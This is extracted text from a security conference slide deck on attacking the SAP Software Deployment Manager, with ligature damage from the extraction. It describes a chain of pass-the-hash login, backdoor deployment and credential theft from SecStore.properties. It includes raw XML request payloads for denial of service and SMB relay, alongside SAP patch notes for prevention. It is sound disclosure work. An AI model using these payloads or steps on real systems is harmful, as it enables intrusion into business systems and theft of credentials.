Invest in security to secure investments Injec&ng evil code in your SAP J2EE systems: Security of SAP So<ware Deployment Server Alexander Polyakov CTO Dmitry Chastukhin Director of SAP pentest/research team ERPScan
Invest in security to secure investments
Injec&ng evil code in your SAP J2EE systems: Security of SAP So<ware Deployment Server Alexander Polyakov CTO Dmitry Chastukhin Director of SAP pentest/research team ERPScan
Alexander Polyakov
• CTO of the ERPScan company • EAS-‐SEC.org project leader • Business applica@on security expert • R&D Professional of the year by Network Products Guide • Organizer of ZeroNights conference
TwiKer: @sh2kerr
erpscan.com 2 ERPScan — invest in security to secure investments
Business applica@on security expert
Yet another security researcher
3 erpscan.com ERPScan — invest in security to secure investments
Dmitry Chastukhin
ERPScan: innova&ve company
• Developing soQware for SAP security monitoring
• Providing SAP/ERP security trainings and consul@ng • Invited to talk at more than 40 key security conferences
worldwide (BlackHat, RSA, Defcon, HITB) • First to develop soQware for NetWeaver J2EE assessment Research team with experience in different areas of security from ERP and web security to mobile, embedded devices, and cri9cal infrastructure, accumula9ng their knowledge on SAP research.
erpscan.com 4 ERPScan — invest in security to secure investments
Leading SAP AG partner in the field of discovering security vulnerabili&es by the number of found vulnerabili&es (25 %)
SAP
Вставьте рисунок на слайд, скруглите верхний левый и нижний правый угол (Формат – Формат рисунка), добавьте контур (оранжевый, толщина – 3)
erpscan.com 5 ERPScan — invest in security to secure investments
• The most popular business applica@on • More than 250000 customers worldwide • 83 % Forbes 500 companies run SAP • Main system – ERP • 3 pla|orms
‒ NetWeaver ABAP ‒ NetWeaver J2EE ‒ BusinessObjects
SAP insecurity
Espionage • Stealing financial informa@on • Stealing corporate secrets • Stealing supplier and customer lists • Stealing HR data
Fraud • False transac@ons • Modifica@on of master data
Sabotage • Denial of service • Modifica@on of financial reports • Access to technology network (SCADA) by trust rela@ons
6 erpscan.com ERPScan — invest in security to secure investments
0
100
200
300
400
500
600
700
800
900
2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014
7 erpscan.com ERPScan — invest in security to secure investments
More than 2800 in total
SAP vulnerabili&es
Source: SAP Security in Figures
Is it remotely exploitable?
> 5000 non-‐web SAP services exposed in the world including Dispatcher, Message Server, Sap Host Control, etc.
8 erpscan.com ERPScan — invest in security to secure investments
sapscan.com
What about other services?
0
1
2
3
4
5
6
7
8
9
SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd
9 erpscan.com ERPScan — invest in security to secure investments
Source: SAP Security in Figures
SAP applica&on servers
• SAP NetWeaver ABAP • SAP NetWeaver J2EE
– SAP Portal – SAP Solu@on Manager – SAP NetWeaver Development Infrastructure (NWDI)
• SAP BusinessObjects • SAP HANA Extended Applica@on Services • SAP SUP • SAP Fiori
erpscan.com 10 ERPScan — invest in security to secure investments
SAP NetWeaver development infrastructure
• Design Time Repository (DTR) • Component Build Service (CBS) • Change Management Service (CMS) • SoQware Landscape Directory (SLD) / NS • SoQware Deployment Manager (SDM)
erpscan.com 11 ERPScan — invest in security to secure investments
SAP NetWeaver development infrastructure
erpscan.com 12 ERPScan — invest in security to secure investments
SAP NetWeaver development infrastructure
erpscan.com 13 ERPScan — invest in security to secure investments
SAP NetWeaver development infrastructure
erpscan.com 14 ERPScan — invest in security to secure investments
SAP NetWeaver development infrastructure
erpscan.com 15 ERPScan — invest in security to secure investments
SAP NetWeaver development infrastructure
erpscan.com 16 ERPScan — invest in security to secure investments
SAP NetWeaver development infrastructure
erpscan.com 17 ERPScan — invest in security to secure investments
So<ware Deployment Manager
• Single interface for the deployment • Deploy apps (*.ear, *.war, *.sda) • Implement custom patches
18 erpscan.com ERPScan — invest in security to secure investments
SDM server
• Different server modes – Standalone – Integrated
• Only one user at a @me • Only the hardcoded admin user • Three ports:
– 50017 – Admin Port – 50018 – GUI Port – 50019 – HTTP Port
19 erpscan.com ERPScan — invest in security to secure investments
SDM client
• Browsing the distribu@on of deployed components • Deploying and undeploying • Log viewing
20 erpscan.com ERPScan — invest in security to secure investments
SDM adack intro
• SAP infrastructure includes many Java services • Almost all Java stuff uses UME • Universal user with a password • Only one user at a @me • Ability to deploy evil code => plus, see point 1
21 erpscan.com ERPScan — invest in security to secure investments
SDM adack intro
• Thick client Java applica@on (sad story) • Scarce communica@ons se�ngs • Difficult to intercept • Custom protocols
22 erpscan.com ERPScan — invest in security to secure investments
SDM adack intro
• SAP has its own SAP Java Virtual Machine (JVM) • Java 6 has AKach API • AKach to another running JVM • Intercept and modify calls
23 erpscan.com ERPScan — invest in security to secure investments
Adack SAP SDM. DoS
• If an aKacker uses an incorrect password 3 @mes, the server will shutdown automa@cally
• Also, if you send this request, you can shutdown the SDM server manually:
[10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest>
24 erpscan.com ERPScan — invest in security to secure investments
Adacking SAP SDM. SMB relay
Packed:
[10 Spaces]<?xml version="1.0"?> <FileAccessRequest f="\\ip_addr\blabla"> </FileAccessRequest>
An old trick, but some@mes it’s very useful
25 erpscan.com ERPScan — invest in security to secure investments
Preven&on
• Install Note 1724516 • Enable the security features of SDM • SDM server and SDM client need to be updated
hKps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
26 erpscan.com ERPScan — invest in security to secure investments
From Nobody to Administrator
Now, I will show an interes9ng aAack
Compromise some SAP services
Compromise SAP SDM
Compromise SAP server OS
Compromise SAP
27 erpscan.com ERPScan — invest in security to secure investments
SDM authen&ca&on abuse
• OK. Let’s see how authen@ca@on in SDM works: – User enters password – Hash is calculated locally on client – Password hash is sent to server – Hash is compared to the hash from configura@on file
Pass the hash adack here!
28 erpscan.com ERPScan — invest in security to secure investments
SDM authen&ca&on abuse
RootFrame.class
29 erpscan.com ERPScan — invest in security to secure investments
SDM authen&ca&on abuse
…\SDM\program\config\sdmrepository.sdc
30 erpscan.com ERPScan — invest in security to secure investments
SDM authen&ca&on abuse
31 erpscan.com ERPScan — invest in security to secure investments
Adack on SAP SDM
Read sdmrepository.sdc
Get password hash
Use hash as password to authen@cate on the SDM server
Deploy backdoor on the SAP server
PROFIT!
32 erpscan.com ERPScan — invest in security to secure investments
File read
• OS command execu@on through CTC (Notes 1467771, 1445998 ) • XML External En@@es (Note 1619539) • Directory Traversal (Note 1630293 ) • Through MMC file read func@on (Notes 927637 and 1439348)
We have something new for u J
33 erpscan.com ERPScan — invest in security to secure investments
SAP LogViewer standalone
• Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket) • You can:
– View log on local server – View log on remote server – Register file as log file
Read log file without authen&ca&on!
34 erpscan.com ERPScan — invest in security to secure investments
SAP LogViewer standalone
Adack is predy easy
Connect to LogViewer standalone server
Register sdmrepository.sdc file as log file
Read it
35 erpscan.com ERPScan — invest in security to secure investments
SAP LogViewer standalone
36 erpscan.com ERPScan — invest in security to secure investments
SAP LogViewer standalone
When we have a password hash, we can use it as password to authen@cate on the SDM server
37 erpscan.com ERPScan — invest in security to secure investments
Preven&on
• Install Note 1685106 • Enable the security features of the Standalone LogViewer Server and client • LogViewer server and client need to be updated
38 erpscan.com ERPScan — invest in security to secure investments
SDM intrusion
Full info about the SDM repository
39 erpscan.com ERPScan — invest in security to secure investments
Bypassing SDM restric&ons
• Observe all server directories • Read arbitrary files via LogViewer
40 erpscan.com ERPScan — invest in security to secure investments
SDM undeploying
Undeploy any applica@on
41 erpscan.com ERPScan — invest in security to secure investments
SDM backdooring
Deploy any applica@on
42 erpscan.com ERPScan — invest in security to secure investments
SDM backdooring
• before
• aQer
43 erpscan.com ERPScan — invest in security to secure investments
SDM post-‐exploita&on
44 erpscan.com ERPScan — invest in security to secure investments
Preven&on
• Install Note 1724516 • Enable the security features of SDM • SDM server and SDM client need to be updated
hKps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
45 erpscan.com ERPScan — invest in security to secure investments
“The SoEware Deployment Manager (SDM) uses the database connec9on informa9on, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as soEware deployment and undeployment.”
hKp://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
Wow! J2EE Engine administrator user and password
Where is all this stuff located?
SAP SecStore
46 erpscan.com ERPScan — invest in security to secure investments
SAP SecStore
47 erpscan.com ERPScan — invest in security to secure investments
“By default, the J2EE Engine stores secure data in the file \usr\sap\<SID>\SYS\global\security\data\SecStore.proper9es in the file system.”
“The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm.”
hKp://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
OK. Let’s try to read SecStore.proper9es
SAP SecStore
48 erpscan.com ERPScan — invest in security to secure investments
• We can execute any OS command (we have our backdoor) • We know the SAP J2EE Engine stores the database
user SAP<SID>DB; its password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
• It’s all that we need
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
SecStore.proper&es
49 erpscan.com ERPScan — invest in security to secure investments
But where is the key?
Get the password
• We have an encrypted password • We have a key to decrypt it
50 erpscan.com ERPScan — invest in security to secure investments
We got the J2EE admin and JDBC login:password!
Preven&on
Restrict read access to files SecStore.proper9es and SecStore.key hKp://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm
51 erpscan.com ERPScan — invest in security to secure investments
Post-‐exploita&on
52 erpscan.com ERPScan — invest in security to secure investments
SDM hacking demo
53 erpscan.com ERPScan — invest in security to secure investments
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
SAP Guides
It’s all in your hands
Regular security assessments
ABAP code review
Monitoring technical security
Segrega&on of Du&es
Security events monitoring
Future work
I'd like to thank SAP's Product Security Response Team for the great coopera9on to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new aAacks and demos, follow us at @erpscan and aAend future presenta9ons.
erpscan.com 55 ERPScan — invest in security to secure investments
Web: www.erpscan.com e-‐mail: [email protected] TwiKer: @erpscan @_chipik @sh2kerr